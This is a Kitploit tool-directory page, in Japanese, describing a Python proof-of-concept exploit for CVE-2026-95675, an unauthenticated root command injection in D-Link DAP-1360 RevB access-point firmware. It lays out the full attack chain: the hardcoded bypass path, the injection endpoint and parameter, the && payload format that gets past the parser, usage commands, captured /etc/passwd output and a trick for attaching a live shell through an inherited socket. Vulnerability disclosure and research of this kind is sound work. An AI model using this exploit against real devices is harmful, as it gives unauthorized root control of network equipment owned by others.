Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-95675 — Python PoCは、D-Link DAP-1360 RevBファームウェアにおける未認証のrootコマンドインジェクションであるCVE-2026-95675を、ハードコードされた認証バイパスとformSystemCheckハンドラーを介して悪用するものです。 | Kitploit
ツール/GitHubGitHub/d6fault/cve-2026-95675
組み込みシステムセキュリティIoTセキュリティ脆弱性分析エクスプロイトリバースエンジニアリングウェブアプリケーション悪用ハードウェアとIoTセキュリティリモートアクセスツールファームウェア解析
GitHubd6fault/cve-2026-95675

CVE-2026-95675

Python PoCは、D-Link DAP-1360 RevBファームウェアにおける未認証のrootコマンドインジェクションであるCVE-2026-95675を、ハードコードされた認証バイパスとformSystemCheckハンドラーを介して悪用するものです。

1210時間4分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2026-95675 — D-Link DAP-1360 RevB

formSystemCheck ハンドラにおける未認証のリモート root コマンド実行 (CWE-78 — OS コマンドインジェクション) で、ハードコードされた認証バックドア経由で到達可能。DAP-1360 RevB、ファームウェア 2.14B05 で検証済み。

根本原因

連鎖する 2 つの独立した問題:

1. ハードコードされた認証バイパスパス。 main (httpd @ 0x4064c8) 内:

root@kitploit:~
strcasecmp(request_path, "dEfWzDLOgIn")   ; token @ 0x48046c
  ...
  sw 1, 8(sp_login_slot)                  ; mark this source-IP as logged in

GET /dEfWzDLOgIn は 404 を返す (実在するファイルではない) が、副作用としてリクエスト元の送信元 IP のセッションスロットを認証済みとしてフラグを立てる — ユーザー名、パスワード、キャプチャは不要。

2. OS コマンドインジェクション。 formSystemCheck (POST /apply.cgi?formSystemCheck) は以下のようにシェルコマンドを構築する:

root@kitploit:~
_system("ping %s -c 2 >/tmp/test_ping", cgi("ipv4_ping"))

ipv4_ping はサニタイズされずにフォーマット文字列へ渡される; _system() は vsprintf で固定スタックバッファへ書き込み、それを system() に渡す。このハンドラ自体は認証チェックを行わない。

パーサーの注意点

busybox の POST ボディパーサーは ;、|、バッククォート、改行を除去するが、&& は残る。ペイロードはプレフィックスの ping を終端させ、その後 && で連結する必要がある。例:

root@kitploit:~
127.0.0.1 -c 1 && <command> > /www/out.htm && x

使用方法

root@kitploit:~
python3 autopoc.py <target> [command]

python3 autopoc.py 192.168.0.50
python3 autopoc.py 192.168.0.50 "ls -la /"
引数説明
targetターゲットホスト/IP (デフォルトスキーム http://)
command (オプション)実行する root コマンド (デフォルト: cat /etc/passwd); ;/`

動作の仕組み

  1. GET /dEfWzDLOgIn — ハードコードされた認証バイパスをトリガーする (404 を返す; 副作用はサーバー側で発生)。
  2. POST /apply.cgi?formSystemCheck に ipv4_ping=127.0.0.1 -c 1 && <cmd> > /www/<OUT> && x — root コマンドインジェクション。
  3. GET /<OUT> — コマンド出力を取得する (httpd は .htm/.html を配信し、.txt は配信しない)。

出力

root@kitploit:~
[*] target   : 192.168.0.50
[*] command  : cat /etc/passwd
[*] GET /dEfWzDLOgIn -> 404 (login slot flagged)
[*] POST /apply.cgi?formSystemCheck -> 302
[+] output (RCE.htm):
------------------------------------------------------------
root:x:0:0:root:/:/dev/null
nobody:x:0:0:nobody:/:/dev/null
------------------------------------------------------------

注意事項 / 制限

  • デバイスの busybox には nc、wget、base64、chmod、id がない — cat、echo、ls、cp などを使用すること。
  • 出力は誰でも書き込み可能な docroot に書き込まれ、HTTP 経由で取得される (リスナー不要)。
  • インタラクティブシェルの場合、インジェクトされたプロセスはクライアントソケットを fd 5 として継承する; httpd が _system() の戻りまでレスポンスを遅延させることと組み合わせると、sh <&5 >&5 2>&5 でライブ接続にシェルをアタッチできる (ユーザーモード QEMU では不安定; 実機ではより良好)。
  • DAP-1360 RevC1 / ファームウェア 3.00 や「D-Link Russia」の DIR/xDSL ビルドには該当しない — エンドポイント、docroot、パーサーが異なる。これらには別途分析が必要。

露出状況

Shodan ("CAMEO-httpd"、httpd ベンダーバナー) は、この正確なコードベースのインターネット露出インスタンスを少数のみ示している; このデバイスは主に LAN 側のアクセスポイントである。悪用には Web 管理インターフェースへの到達性が必要である。

ツールをダウンロード